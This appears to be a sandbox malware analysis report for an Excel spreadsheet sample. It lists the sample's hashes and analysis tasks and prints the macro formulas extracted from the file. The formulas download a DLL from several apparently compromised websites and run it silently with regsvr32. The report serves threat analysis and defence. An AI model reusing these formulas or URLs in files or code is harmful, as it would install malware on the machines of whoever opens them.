General
Target: 56ea587c1ab8efb5cc25c7491195f2efd6f1c1a533e1603605ddfa44051dd23a
Size: 29KB
Sample: 240909-1wcweasdmq
MD5: c21157422bc9b05232891a332c35a2fd
SHA1: 791f2d9c8178c44de752136047bd9a33b040daad
SHA256: 56ea587c1ab8efb5cc25c7491195f2efd6f1c1a533e1603605ddfa44051dd23a
SHA512: 72e60f84edb0dcdec5b147723583d749c9c011a2a745c1614eb538189bbc8a0e4beb3953c8b9eabab24feba2b6c985136128c541ad824899e9adb61ecdf0db62
SSDEEP: 384:EC7TmBkUnAKBmnAcLK5J9AVs6TeEB/g4Bmq3FrEBTqxGFzHHnjCMf4VdnIEk8DY:EC7TUnAKmD4ys2ewg4F32BlHHOx1vjs
Static task: static1
Behavioral task: behavioral1
Sample: 56ea587c1ab8efb5cc25c7491195f2efd6f1c1a533e1603605ddfa44051dd23a.xlsx
Resource: win7-20240729-en
Behavioral task: behavioral2
Sample: 56ea587c1ab8efb5cc25c7491195f2efd6f1c1a533e1603605ddfa44051dd23a.xlsx
Resource: win10v2004-20240802-en
Malware Config
Extracted
formulas
=CALL("urlmon","URLDownloadToFileA","JJCCBB",0,"https://www.casache.com/web/gTj3TrZ/","..\rfs.dll",0,0)
=IF('LFEVE'!F11<0,CALL("urlmon","URLDownloadToFileA","JJCCBB",0,"https://www.aulavirtualapecc.com/server/oib/","..\rfs.dll",0,0))
=IF('LFEVE'!F13<0,CALL("urlmon","URLDownloadToFileA","JJCCBB",0,"http://30aweddingco.com/cgi-bin/QUx/","..\rfs.dll",0,0))
=IF('LFEVE'!F15<0,CALL("urlmon","URLDownloadToFileA","JJCCBB",0,"http://blacksmithbooks.com/blog/OkmsfYUA/","..\rfs.dll",0,0))
=IF('LFEVE'!F17<0,CALL("urlmon","URLDownloadToFileA","JJCCBB",0,"http://consultores-sic.com/fw/AOOfOtj1qqgLWR/","..\rfs.dll",0,0))
=IF('LFEVE'!F19<0,CALL("urlmon","URLDownloadToFileA","JJCCBB",0,"http://www.tugarden.com/docs/csv_import/xGmX9fs73iJl/","..\rfs.dll",0,0))
=IF('LFEVE'!F21<0,CALL("urlmon","URLDownloadToFileA","JJCCBB",0,"https://damjangro.org/data/XPMJ/","..\rfs.dll",0,0))
=IF('LFEVE'!F23<0,CLOSE(0),)
=EXEC("C:\Windows\SysWow64\regsvr32.exe -s ..\rfs.dll")
=RETURN()
Targets
Score: 3/10